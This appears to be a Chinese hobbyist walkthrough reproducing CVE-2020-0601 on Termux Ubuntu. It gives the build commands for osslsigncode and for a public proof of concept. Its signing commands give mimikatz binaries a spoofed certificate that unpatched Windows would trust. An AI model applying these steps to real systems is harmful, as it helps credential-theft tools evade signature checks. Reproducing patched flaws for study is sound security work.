这是一个由美国国安局(NSA)提交的漏洞,出现漏洞的系统是2020年之前的win 10和windows server 2019

准备

基于Termux的乌班图 POC(https://github.com/ollypwn/CVE-2020-0601) 软件包: openssl 1.1.0 ruby 2.4.0 签名工具:signtool.exe(Visual Studio里面集成) 或osslsigncode (Linux 我只在Ubuntu(ARM)上实现过,官方上面写着Ubuntu和Debian都可以)

安装osslsigncode

git clone https://github.com/mtrojnar/osslsigncode.git

安装依赖环境

sudo apt-get update && sudo apt-get install build-essential autoconf libtool libssl-dev python3-pkgconfig libcurl4-gnutls-dev

安装指令

cd osslsigncode
./autogen.sh
  ./configure
  make
  make install

操作

git clone https://github.com/ollypwn/CVE-2020-0601.git

下载完成后,按照readme.md上”Code Signing”的命令操作(这次我选择了mimikatz作为测试对象)

cd CVE-2020-0601
"Code Signing"
......
osslsigncode sign -pkcs12 cert.p12 -n "Signed by moz" -in x64/mimikatz.exe -out 1.exe
osslsigncode sign -pkcs12 cert.p12 -n "Signed by moz" -in x64/mimilib.dll -out 1.dll
osslsigncode sign -pkcs12 cert.p12 -n "Signed by moz" -in x64/mimidrv.sys -out 1.sys

生成的文件发到电脑上进行检验 (配图)

总结

乌班图的安装有点费力,不过这个结果我相当满意(不需要电脑就能完成基本渗透)